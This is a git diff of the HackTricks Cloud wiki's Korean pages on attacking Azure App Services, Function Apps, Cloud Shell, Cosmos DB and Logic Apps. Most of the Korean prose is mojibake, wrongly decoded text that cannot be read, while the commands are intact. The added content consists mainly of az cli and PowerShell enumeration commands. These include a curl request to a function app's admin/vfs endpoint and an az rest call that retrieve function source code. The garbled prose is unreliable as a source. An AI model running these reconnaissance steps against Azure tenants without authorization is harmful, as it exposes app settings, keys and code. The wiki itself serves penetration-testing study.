์น์ก์๋ 2๊ฐ์ง ์ ํ์ด ์์ต๋๋ค:
-- **์ง์์ **: ๋ฌดํ ๋ฃจํ์์ ์คํ๋๋ฉฐ ์์ฑ๋์๋ง์ ํธ๋ฆฌ๊ฑฐ๋ฉ๋๋ค. ์ง์์ ์ธ ์ฒ๋ฆฌ๊ฐ ํ์ํ ์์
์ ์ด์์ ์
๋๋ค. ๊ทธ๋ฌ๋ Always On์ด ๋นํ์ฑํ๋์ด ์ฑ์ด ์ค์ง๋๊ณ ์ง๋ 20๋ถ ๋์ ์์ฒญ์ ๋ฐ์ง ์์ผ๋ฉด ์น์ก๋ ์ค์ง๋ฉ๋๋ค.
+- **์ง์์ **: ๋ฌดํ ๋ฃจํ์์ ์คํ๋๋ฉฐ ์์ฑ๋์๋ง์ ํธ๋ฆฌ๊ฑฐ๋ฉ๋๋ค. ์ง์์ ์ธ ์ฒ๋ฆฌ๊ฐ ํ์ํ ์์
์ ์ด์์ ์
๋๋ค. ๊ทธ๋ฌ๋ Always On์ด ๋นํ์ฑํ๋์ด ์ฑ์ด 20๋ถ ๋์ ์์ฒญ์ ๋ฐ์ง ์์ผ๋ฉด ์น์ก๋ ์ค์ง๋ฉ๋๋ค.
- **ํธ๋ฆฌ๊ฑฐ**: ํ์์ ๋ฐ๋ผ ๋๋ ์ผ์ ์ ๋ฐ๋ผ ์คํ๋ฉ๋๋ค. ๋ฐฐ์น ๋ฐ์ดํฐ ์
๋ฐ์ดํธ ๋๋ ์ ์ง ๊ด๋ฆฌ ๋ฃจํด๊ณผ ๊ฐ์ ์ฃผ๊ธฐ์ ์ธ ์์
์ ๊ฐ์ฅ ์ ํฉํฉ๋๋ค.
์น์ก์ ํ๊ฒฝ์์ **์ฝ๋๋ฅผ ์คํ**ํ๊ณ ์ฐ๊ฒฐ๋ ๊ด๋ฆฌ ID์ ๋ํ **๊ถํ ์์น**์ ์ฌ์ฉํ ์ ์๊ธฐ ๋๋ฌธ์ ๊ณต๊ฒฉ์์ ๊ด์ ์์ ๋งค์ฐ ํฅ๋ฏธ๋กญ์ต๋๋ค.
-๋ํ, ์น์ก์์ ์์ฑ๋ **๋ก๊ทธ**๋ฅผ ํ์ธํ๋ ๊ฒ๋ ํญ์ ํฅ๋ฏธ๋กญ์ต๋๋ค. ์ด ๋ก๊ทธ์๋ **๋ฏผ๊ฐํ ์ ๋ณด**๊ฐ ํฌํจ๋ ์ ์์ต๋๋ค.
+๋ํ, ์น์ก์์ ์์ฑ๋ **๋ก๊ทธ**๋ฅผ ํ์ธํ๋ ๊ฒ๋ ํญ์ ํฅ๋ฏธ๋กญ์ต๋๋ค. ๋ก๊ทธ์๋ **๋ฏผ๊ฐํ ์ ๋ณด**๊ฐ ํฌํจ๋ ์ ์์ต๋๋ค.
## Slots
@@ -87,9 +87,9 @@ Azure App Service Slots๋ **๋์ผํ App Service์ ์ ํ๋ฆฌ์ผ์ด์
์ ๋ค
## Azure Function Apps
-๊ธฐ๋ณธ์ ์ผ๋ก **Azure Function ์ฑ์ Azure App Service์ ํ์ ์งํฉ**์
๋๋ค. ์น ์ฝ์์ ๊ฐ์ ๋ชจ๋ ์ฑ ์๋น์ค๋ฅผ ๋์ดํ๊ฑฐ๋ az cli์์ `az webapp list`๋ฅผ ์คํํ๋ฉด **Function ์ฑ๋ ๋์ด๋ ๊ฒ์ ๋ณผ ์ ์์ต๋๋ค**.
+๊ธฐ๋ณธ์ ์ผ๋ก **Azure Function ์ฑ์ Azure App Service์ ํ์ ์งํฉ**์
๋๋ค. ์น ์ฝ์๋ก ์ด๋ํ์ฌ ๋ชจ๋ ์ฑ ์๋น์ค๋ฅผ ๋์ดํ๊ฑฐ๋ az cli์์ `az webapp list`๋ฅผ ์คํํ๋ฉด **Function ์ฑ๋ ๋์ด๋ ๊ฒ์ ๋ณผ ์ ์์ต๋๋ค**.
-๋ฐ๋ผ์ ๋ ์๋น์ค๋ ์ค์ ๋ก ๋๋ถ๋ถ **๊ฐ์ ๊ตฌ์ฑ, ๊ธฐ๋ฅ ๋ฐ ์ต์
์ az cli์์** ๊ฐ์ง๊ณ ์์ง๋ง, ์ฝ๊ฐ ๋ค๋ฅด๊ฒ ๊ตฌ์ฑํ ์ ์์ต๋๋ค(์: appsettings์ ๊ธฐ๋ณธ๊ฐ์ด๋ Function ์ฑ์์์ ์คํ ๋ฆฌ์ง ๊ณ์ ์ฌ์ฉ).
+๋ฐ๋ผ์ ๋ ์๋น์ค๋ ์ค์ ๋ก ๋๋ถ๋ถ **๊ฐ์ ๊ตฌ์ฑ, ๊ธฐ๋ฅ ๋ฐ ์ต์
์ az cli์์ ๊ฐ์ง๊ณ ์์ผ๋ฉฐ**, ์ฝ๊ฐ ๋ค๋ฅด๊ฒ ๊ตฌ์ฑํ ์ ์์ต๋๋ค(์: appsettings์ ๊ธฐ๋ณธ๊ฐ ๋๋ Function ์ฑ์์ ์คํ ๋ฆฌ์ง ๊ณ์ ์ ์ฌ์ฉ).
## Enumeration
@@ -181,10 +181,55 @@ az webapp hybrid-connections list --name --resource-group
{{#tab name="Az Powershell" }}
```bash
+Get-Command -Module Az.Websites
+
# Get App Services and Function Apps
Get-AzWebApp
# Get only App Services
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
+
+# Retrieves details of a specific App Service Environment in the specified resource group.
+Get-AzAppServiceEnvironment -ResourceGroupName -Name
+# Retrieves the access restriction configuration for a specified Web App.
+Get-AzWebAppAccessRestrictionConfig -ResourceGroupName -Name
+# Retrieves the SSL certificates for a specified resource group.
+Get-AzWebAppCertificate -ResourceGroupName
+# Retrieves the continuous deployment URL for a containerized Web App.
+Get-AzWebAppContainerContinuousDeploymentUrl -ResourceGroupName -Name
+# Retrieves the list of continuous WebJobs for a specified Web App.
+Get-AzWebAppWebJob -ResourceGroupName -AppName
+# Retrieves the list of triggered WebJobs for a specified Web App.
+Get-AzWebAppTriggeredWebJob -ResourceGroupName -AppName
+
+# Retrieves details of a deleted Web App in the specified resource group.
+Get-AzDeletedWebApp -ResourceGroupName -Name
+# Retrieves a list of snapshots for a specified Web App.
+Get-AzWebAppSnapshot -ResourceGroupName -Name
+# Retrieves the history of a specific triggered WebJob for a Web App.
+Get-AzWebAppTriggeredWebJobHistory -ResourceGroupName -AppName -Name
+
+# Retrieves information about deployment slots for a specified Web App.
+Get-AzWebAppSlot -ResourceGroupName -Name
+# Retrieves the continuous WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotWebJob -ResourceGroupName -AppName -SlotName
+# Retrieves the triggered WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotTriggeredWebJob -ResourceGroupName -AppName -SlotName
+# Retrieves the history of a specific triggered WebJob for a deployment slot of a Web App.
+Get-AzWebAppSlotTriggeredWebJobHistory -ResourceGroupName -AppName -SlotName -Name
+# Retrieves the continuous WebJobs for a Web App.
+Get-AzWebAppContinuousWebJob -ResourceGroupName -AppName
+# Retrieves the continuous WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotContinuousWebJob -ResourceGroupName -AppName -SlotName
+
+# Retrieves the traffic routing rules for a Web App.
+Get-AzWebAppTrafficRouting -ResourceGroupName -WebAppName -RuleName
+
+# Retrieves details of a specific backup for a Web App.
+Get-AzWebAppBackup -ResourceGroupName -Name -BackupId
+# Retrieves the backup configuration for a Web App.
+Get-AzWebAppBackupConfiguration -ResourceGroupName -Name
+# Retrieves the list of all backups for a Web App.
+Get-AzWebAppBackupList -ResourceGroupName -Name
```
{{#endtab }}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
new file mode 100644
index 000000000..b27e02ed4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
@@ -0,0 +1,58 @@
+# Az - Cloud Shell
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** ๐ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Azure Cloud Shell
+
+**Azure Cloud Shell**๋ Azure ๋ฆฌ์์ค๋ฅผ ๊ด๋ฆฌํ๊ธฐ ์ํด ์ค๊ณ๋ ๋ํํ ์ธ์ฆ ๋ธ๋ผ์ฐ์ ์ ๊ทผ ํฐ๋ฏธ๋๋ก, Bash ๋๋ PowerShell ์ค ํ๋๋ก ์์
ํ ์ ์๋ ์ ์ฐ์ฑ์ ์ ๊ณตํฉ๋๋ค. ์ด ์๋น์ค๋ ๋นํ์ฑ ์ํ๊ฐ 20๋ถ์ด ์ง๋๋ฉด ํ์์์๋๋ ์์ ์ธ์
ํธ์คํธ์์ ์คํ๋๋ฉฐ, $HOME ์์น์ 5-GB ํ์ผ ๊ณต์ ๋ฅผ ์ฌ์ฉํ์ฌ ํ์ผ์ ์ ์งํฉ๋๋ค. Cloud Shell์ Azure ํฌํธ, shell.azure.com, Azure CLI ๋ฐ PowerShell ๋ฌธ์, Azure ๋ชจ๋ฐ์ผ ์ฑ, Visual Studio Code Azure ๊ณ์ ํ์ฅ ๋ฑ ์ฌ๋ฌ ์ง์ ์ ํตํด ์ ๊ทผํ ์ ์์ต๋๋ค.
+
+์ด ์๋น์ค์๋ ๊ถํ์ด ํ ๋น๋์ง ์์ผ๋ฏ๋ก ๊ถํ ์์น ๊ธฐ์ ์ด ์์ต๋๋ค. ๋ํ ์ด๋ค ์ข
๋ฅ์ ์ด๊ฑฐ๋ ์์ต๋๋ค.
+
+### ์ฃผ์ ๊ธฐ๋ฅ
+
+**ํ๊ฒฝ**: Azure Cloud Shell์ ํด๋ผ์ฐ๋ ์ธํ๋ผ๋ฅผ ์ํด ์ค๊ณ๋ Microsoft์ ์์ฒด Linux ๋ฐฐํฌํ์ธ Azure Linux์์ ์คํ๋์ด ์์ ํ ํ๊ฒฝ์ ์ ๊ณตํฉ๋๋ค. Azure Linux ๋ฆฌํฌ์งํ ๋ฆฌ์ ํฌํจ๋ ๋ชจ๋ ํจํค์ง๋ ๊ณต๊ธ๋ง ๊ณต๊ฒฉ์ ๋ฐฉ์งํ๊ธฐ ์ํด Microsoft์ ์ํด ๋ด๋ถ์ ์ผ๋ก ์ปดํ์ผ๋ฉ๋๋ค.
+**์ฌ์ ์ค์น๋ ๋๊ตฌ**: Cloud Shell์๋ Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git ๋ฐ vim, nano, emacs์ ๊ฐ์ ํ
์คํธ ํธ์ง๊ธฐ์ ๊ฐ์ ํฌ๊ด์ ์ธ ์ฌ์ ์ค์น ๋๊ตฌ ์ธํธ๊ฐ ํฌํจ๋์ด ์์ต๋๋ค. ์ด๋ฌํ ๋๊ตฌ๋ ์ฆ์ ์ฌ์ฉํ ์ ์์ต๋๋ค. ์ค์น๋ ํจํค์ง ๋ฐ ๋ชจ๋์ ๋์ดํ๋ ค๋ฉด "Get-Module -ListAvailable", "tdnf list" ๋ฐ "pip3 list"๋ฅผ ์ฌ์ฉํ ์ ์์ต๋๋ค.
+**$HOME ์ง์์ฑ**: Azure Cloud Shell์ ์ฒ์ ์์ํ ๋, ์ฐ๊ฒฐ๋ ์คํ ๋ฆฌ์ง ๊ณ์ ์ด ์๊ฑฐ๋ ์๊ฑฐ๋ ์ฌ์ฉํ ์ ์์ต๋๋ค. ์คํ ๋ฆฌ์ง๋ฅผ ์ฐ๊ฒฐํ์ง ์์ผ๋ฉด ์ธ์
์ด ์ข
๋ฃ๋ ๋ ํ์ผ์ด ์ญ์ ๋๋ ์ผ์์ ์ธ ์ธ์
์ด ์์ฑ๋ฉ๋๋ค. ์ธ์
๊ฐ ํ์ผ์ ์ ์งํ๋ ค๋ฉด ์คํ ๋ฆฌ์ง ๊ณ์ ์ ๋ง์ดํธํด์ผ ํ๋ฉฐ, ์ด๋ ์๋์ผ๋ก **$HOME\clouddrive**๋ก ์ฐ๊ฒฐ๋๋ฉฐ, **$HOME** ๋๋ ํ ๋ฆฌ๋ Azure File Share์ **.img** ํ์ผ๋ก ์ ์ฅ๋ฉ๋๋ค. ๊ทธ๋ฌ๋ $HOME ์ธ๋ถ์ ํ์ผ๊ณผ ๋จธ์ ์ํ๋ ์ ์ง๋์ง ์์ต๋๋ค. SSH ํค์ ๊ฐ์ ๋น๋ฐ์ ์์ ํ๊ฒ ์ ์ฅํ๋ ค๋ฉด Azure Key Vault๋ฅผ ์ฌ์ฉํ์ญ์์ค.
+**Azure ๋๋ผ์ด๋ธ (Azure:)**: Azure Cloud Shell์ PowerShell์๋ Azure ๋ฆฌ์์ค(Compute, Network, Storage ๋ฑ)๋ฅผ ํ์ผ ์์คํ
๊ณผ ์ ์ฌํ ๋ช
๋ น์ ์ฌ์ฉํ์ฌ ์ฝ๊ฒ ํ์ํ ์ ์๋ Azure ๋๋ผ์ด๋ธ(Azure:)๊ฐ ํฌํจ๋์ด ์์ต๋๋ค. cd Azure:๋ก Azure ๋๋ผ์ด๋ธ๋ก ์ ํํ๊ณ cd ~๋ก ํ ๋๋ ํ ๋ฆฌ๋ก ๋์๊ฐ ์ ์์ต๋๋ค. ์ฌ์ ํ Azure PowerShell cmdlet์ ์ฌ์ฉํ์ฌ ๋ชจ๋ ๋๋ผ์ด๋ธ์์ ๋ฆฌ์์ค๋ฅผ ๊ด๋ฆฌํ ์ ์์ต๋๋ค.
+**์ฌ์ฉ์ ์ ์ ๋๊ตฌ ์ค์น**: ์คํ ๋ฆฌ์ง ๊ณ์ ์ผ๋ก Cloud Shell์ ๊ตฌ์ฑํ ์ฌ์ฉ์๋ ๋ฃจํธ ๊ถํ์ด ํ์ํ์ง ์์ ์ถ๊ฐ ๋๊ตฌ๋ฅผ ์ค์นํ ์ ์์ต๋๋ค. ์ด ๊ธฐ๋ฅ์ Cloud Shell ํ๊ฒฝ์ ์ถ๊ฐ๋ก ์ฌ์ฉ์ ์ ์ํ ์ ์๊ฒ ํ์ฌ ์ฌ์ฉ์๊ฐ ํน์ ์๊ตฌ์ ๋ง๊ฒ ์ค์ ์ ์กฐ์ ํ ์ ์๋๋ก ํฉ๋๋ค.
+
+## ์ฐธ์กฐ
+
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
+
+
+## ์ง์์ฑ
+
+{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %}
+[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** ๐ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
index 35dda4ac1..33d5e791a 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
@@ -21,7 +21,7 @@ Learn & practice GCP Hacking:
--database-name
az cosmosdb mongodb role definition list --account-name --resource-group
# List all user definitions for MongoDB within an Azure Cosmos DB account
az cosmosdb mongodb user definition list --account-name --resource-group
-
```
{% endcode %}
{% endtab %}
@@ -363,7 +362,7 @@ GCP ํดํน ๋ฐฐ์ฐ๊ณ ์ฐ์ตํ๊ธฐ:
[!NOTE]
-> ํจ์ ํธ์ถ์ ์ํด ์ฌ์ฉ์์๊ฒ ์ก์ธ์ค๋ฅผ ๋ถ์ฌํ๋ RBAC ๊ถํ์ด ์๋ค๋ ์ ์ ์ ์ํ์ธ์. **ํจ์ ํธ์ถ์ ์์ฑ ์ ์ ํ๋ ํธ๋ฆฌ๊ฑฐ์ ๋ฐ๋ผ ๋ฌ๋ผ์ง๋ฉฐ**, HTTP ํธ๋ฆฌ๊ฑฐ๊ฐ ์ ํ๋ ๊ฒฝ์ฐ **์ก์ธ์ค ํค**๋ฅผ ์ฌ์ฉํด์ผ ํ ์ ์์ต๋๋ค.
+> ํจ์ ํธ์ถ์ ๋ํ ์ก์ธ์ค๋ฅผ ์ฌ์ฉ์์๊ฒ ๋ถ์ฌํ๋ RBAC ๊ถํ์ด ์์์ ์ ์ํ์ญ์์ค. **ํจ์ ํธ์ถ์ ์์ฑ ์ ์ ํ๋ ํธ๋ฆฌ๊ฑฐ์ ๋ฐ๋ผ ๋ฌ๋ผ์ง๋ฉฐ, HTTP ํธ๋ฆฌ๊ฑฐ๊ฐ ์ ํ๋ ๊ฒฝ์ฐ **์ก์ธ์ค ํค**๋ฅผ ์ฌ์ฉํด์ผ ํ ์ ์์ต๋๋ค.**
HTTP ํธ๋ฆฌ๊ฑฐ๋ฅผ ์ฌ์ฉํ์ฌ ํจ์ ๋ด์์ ์๋ํฌ์ธํธ๋ฅผ ์์ฑํ ๋, ํจ์ ํธ๋ฆฌ๊ฑฐ์ ํ์ํ **์ก์ธ์ค ํค ๊ถํ ์์ค**์ ์ง์ ํ ์ ์์ต๋๋ค. ์ธ ๊ฐ์ง ์ต์
์ด ์์ต๋๋ค:
@@ -86,8 +86,8 @@ HTTP ํธ๋ฆฌ๊ฑฐ๋ฅผ ์ฌ์ฉํ์ฌ ํจ์ ๋ด์์ ์๋ํฌ์ธํธ๋ฅผ ์์ฑํ ๋
- **Function Keys:** ํจ์ ํค๋ ๊ธฐ๋ณธ ๋๋ ์ฌ์ฉ์ ์ ์์ผ ์ ์์ผ๋ฉฐ, Function App ๋ด์ **ํน์ ํจ์ ์๋ํฌ์ธํธ**์๋ง ์ ๊ทผ์ ํ์ฉํ๋๋ก ์ค๊ณ๋์์ต๋๋ค.
- **Host Keys:** ํธ์คํธ ํค๋ ๊ธฐ๋ณธ ๋๋ ์ฌ์ฉ์ ์ ์์ผ ์ ์์ผ๋ฉฐ, FUNCTION ์ ๊ทผ ์์ค์ผ๋ก Function App ๋ด์ **๋ชจ๋ ํจ์ ์๋ํฌ์ธํธ**์ ์ ๊ทผ์ ์ ๊ณตํฉ๋๋ค.
-- **Master Key:** ๋ง์คํฐ ํค(`_master`)๋ ๋ชจ๋ ํจ์ ์๋ํฌ์ธํธ์ ๋ํ ์ ๊ทผ์ ํฌํจํ์ฌ **์น๊ฒฉ๋ ๊ถํ**์ ์ ๊ณตํ๋ ๊ด๋ฆฌ ํค์
๋๋ค. ์ด **ํค๋ ์ทจ์ํ ์ ์์ต๋๋ค.**
-- **System Keys:** ์์คํ
ํค๋ **ํน์ ํ์ฅ์ ์ํด ๊ด๋ฆฌ**๋๋ฉฐ, ๋ด๋ถ ๊ตฌ์ฑ ์์์์ ์ฌ์ฉํ๋ ์นํ
์๋ํฌ์ธํธ์ ์ ๊ทผํ๋ ๋ฐ ํ์ํฉ๋๋ค. ์๋ฅผ ๋ค์ด, ์ด๋ฒคํธ ๊ทธ๋ฆฌ๋ ํธ๋ฆฌ๊ฑฐ ๋ฐ ๋ด๊ตฌ์ฑ ํจ์๋ ์์คํ
ํค๋ฅผ ์ฌ์ฉํ์ฌ ํด๋น API์ ์์ ํ๊ฒ ์ํธ์์ฉํฉ๋๋ค.
+- **Master Key:** ๋ง์คํฐ ํค(`_master`)๋ ๋ชจ๋ ํจ์ ์๋ํฌ์ธํธ์ ๋ํ ์ ๊ทผ์ ํฌํจํ์ฌ ๊ถํ์ด ์์น๋ ๊ด๋ฆฌ ํค๋ก, ์ด **ํค๋ ์ทจ์ํ ์ ์์ต๋๋ค.**
+- **System Keys:** ์์คํ
ํค๋ **ํน์ ํ์ฅ์ ์ํด ๊ด๋ฆฌ**๋๋ฉฐ, ๋ด๋ถ ๊ตฌ์ฑ ์์์์ ์ฌ์ฉํ๋ ์นํ
์๋ํฌ์ธํธ์ ์ ๊ทผํ๋ ๋ฐ ํ์ํฉ๋๋ค. ์๋ฅผ ๋ค์ด, Event Grid ํธ๋ฆฌ๊ฑฐ ๋ฐ Durable Functions๋ ์์คํ
ํค๋ฅผ ์ฌ์ฉํ์ฌ ํด๋น API์ ์์ ํ๊ฒ ์ํธ์์ฉํฉ๋๋ค.
> [!TIP]
> ํค๋ฅผ ์ฌ์ฉํ์ฌ ํจ์ API ์๋ํฌ์ธํธ์ ์ ๊ทผํ๋ ์:
@@ -96,7 +96,7 @@ HTTP ํธ๋ฆฌ๊ฑฐ๋ฅผ ์ฌ์ฉํ์ฌ ํจ์ ๋ด์์ ์๋ํฌ์ธํธ๋ฅผ ์์ฑํ ๋
### ๊ธฐ๋ณธ ์ธ์ฆ
-App Services์ ๋ง์ฐฌ๊ฐ์ง๋ก Functions๋ **SCM** ๋ฐ **FTP**์ ์ฐ๊ฒฐํ์ฌ ์ฝ๋๋ฅผ ๋ฐฐํฌํ๊ธฐ ์ํด Azure์์ ์ ๊ณตํ๋ **์ฌ์ฉ์ ์ด๋ฆ๊ณผ ๋น๋ฐ๋ฒํธ๊ฐ ํฌํจ๋ URL**์ ์ฌ์ฉํ์ฌ ๊ธฐ๋ณธ ์ธ์ฆ์ ์ง์ํฉ๋๋ค. ์ด์ ๋ํ ์์ธํ ๋ด์ฉ์:
+App Services์ ๋ง์ฐฌ๊ฐ์ง๋ก, Functions๋ **SCM** ๋ฐ **FTP**์ ์ฐ๊ฒฐํ์ฌ ์ฝ๋๋ฅผ ๋ฐฐํฌํ๊ธฐ ์ํด Azure์์ ์ ๊ณตํ๋ **์ฌ์ฉ์ ์ด๋ฆ๊ณผ ๋น๋ฐ๋ฒํธ๊ฐ ํฌํจ๋ URL**์ ์ฌ์ฉํ์ฌ ๊ธฐ๋ณธ ์ธ์ฆ์ ์ง์ํฉ๋๋ค. ์ด์ ๋ํ ์์ธํ ๋ด์ฉ์:
{{#ref}}
az-app-services.md
@@ -104,7 +104,7 @@ az-app-services.md
### Github ๊ธฐ๋ฐ ๋ฐฐํฌ
-ํจ์๊ฐ Github ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์์ฑ๋ ๋ Azure ์น ์ฝ์์ **ํน์ ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์๋์ผ๋ก Github ์ํฌํ๋ก๋ฅผ ์์ฑ**ํ ์ ์๋๋ก ํ์ฌ ์ด ๋ฆฌํฌ์งํ ๋ฆฌ๊ฐ ์
๋ฐ์ดํธ๋ ๋๋ง๋ค ํจ์์ ์ฝ๋๊ฐ ์
๋ฐ์ดํธ๋ฉ๋๋ค. ์ค์ ๋ก ํ์ด์ฌ ํจ์์ ๋ํ Github Action yaml์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
+ํจ์๊ฐ Github ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์์ฑ๋ ๋ Azure ์น ์ฝ์์ **ํน์ ๋ฆฌํฌ์งํ ๋ฆฌ์์ ์๋์ผ๋ก Github Workflow๋ฅผ ์์ฑ**ํ ์ ์๊ฒ ํด์ฃผ๋ฉฐ, ์ด ๋ฆฌํฌ์งํ ๋ฆฌ๊ฐ ์
๋ฐ์ดํธ๋ ๋๋ง๋ค ํจ์์ ์ฝ๋๊ฐ ์
๋ฐ์ดํธ๋ฉ๋๋ค. ์ค์ ๋ก ํ์ด์ฌ ํจ์์ ๋ํ Github Action yaml์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
@@ -192,18 +192,22 @@ package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
```
-๋ํ, **Managed Identity**๊ฐ ์์ฑ๋์ด ๋ฆฌํฌ์งํ ๋ฆฌ์ Github Action์ด ์ด๋ฅผ ์ฌ์ฉํ์ฌ Azure์ ๋ก๊ทธ์ธํ ์ ์์ต๋๋ค. ์ด๋ **Managed Identity**์ ๋ํด ์ฐํฉ ์๊ฒฉ ์ฆ๋ช
์ ์์ฑํ์ฌ **Issuer** `https://token.actions.githubusercontent.com`์ **Subject Identifier** `repo:/:ref:refs/heads/`๋ฅผ ํ์ฉํจ์ผ๋ก์จ ์ด๋ฃจ์ด์ง๋๋ค.
+๋ํ, **Managed Identity**๊ฐ ์์ฑ๋์ด ๋ฆฌํฌ์งํ ๋ฆฌ์ Github Action์ด ์ด๋ฅผ ์ฌ์ฉํ์ฌ Azure์ ๋ก๊ทธ์ธํ ์ ์์ต๋๋ค. ์ด๋ **Managed Identity**์ ๋ํด **Issuer** `https://token.actions.githubusercontent.com`์ **Subject Identifier** `repo:/:ref:refs/heads/`๋ฅผ ํ์ฉํ๋ Federated credential์ ์์ฑํจ์ผ๋ก์จ ์ด๋ฃจ์ด์ง๋๋ค.
> [!CAUTION]
-> ๋ฐ๋ผ์ ํด๋น ๋ฆฌํฌ์งํ ๋ฆฌ๋ฅผ ์์์ํค๋ ์ฌ๋์ ๊ธฐ๋ฅ๊ณผ ์ด์ ์ฐ๊ฒฐ๋ Managed Identities๋ฅผ ์์์ํฌ ์ ์์ต๋๋ค.
+> ๋ฐ๋ผ์, ํด๋น ๋ฆฌํฌ์งํ ๋ฆฌ๋ฅผ ์์์ํค๋ ์ฌ๋์ ํจ์์ ๊ทธ์ ์ฐ๊ฒฐ๋ Managed Identities๋ฅผ ์์์ํฌ ์ ์์ต๋๋ค.
-### Container Based Deployments
+### ์ปจํ
์ด๋ ๊ธฐ๋ฐ ๋ฐฐํฌ
๋ชจ๋ ์๊ธ์ ๊ฐ ์ปจํ
์ด๋ ๋ฐฐํฌ๋ฅผ ํ์ฉํ๋ ๊ฒ์ ์๋์ง๋ง, ํ์ฉํ๋ ๊ฒฝ์ฐ ๊ตฌ์ฑ์๋ ์ปจํ
์ด๋์ URL์ด ํฌํจ๋ฉ๋๋ค. API์์ **`linuxFxVersion`** ์ค์ ์ `DOCKER|mcr.microsoft.com/...`์ ๊ฐ์ ํํ๋ฅผ ๊ฐ์ง ๊ฒ์ด๋ฉฐ, ์น ์ฝ์์์๋ ๊ตฌ์ฑ์ **image settings**๊ฐ ํ์๋ฉ๋๋ค.
๋ํ, **์์ค ์ฝ๋๋ ํจ์์ ๊ด๋ จ๋ ์คํ ๋ฆฌ์ง** ๊ณ์ ์ ์ ์ฅ๋์ง ์์ต๋๋ค. ํ์ํ์ง ์๊ธฐ ๋๋ฌธ์
๋๋ค.
-## Enumeration
+## ์ด๊ฑฐ
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List all the functions
az functionapp list
@@ -249,6 +253,30 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func
# Get source code
az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.Functions
+
+# Lists all Function Apps in the current subscription or in a specific resource group.
+Get-AzFunctionApp -ResourceGroupName
+
+# Displays the regions where Azure Function Apps are available for deployment.
+Get-AzFunctionAppAvailableLocation
+
+# Retrieves details about Azure Function App plans in a subscription or resource group.
+Get-AzFunctionAppPlan -ResourceGroupName -Name
+
+# Retrieves the app settings for a specific Azure Function App.
+Get-AzFunctionAppSetting -Name -ResourceGroupName
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
## ๊ถํ ์์น
{{#ref}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
index 5adcec3fe..8cb72d3a5 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
@@ -11,7 +11,7 @@ Logic Apps๋ **๊ด๋ฒ์ํ ์ฌ์ ๊ตฌ์ถ๋ ์ปค๋ฅํฐ**๋ฅผ ์ฌ์ฉํ์ฌ ์ํฌ
### ์์
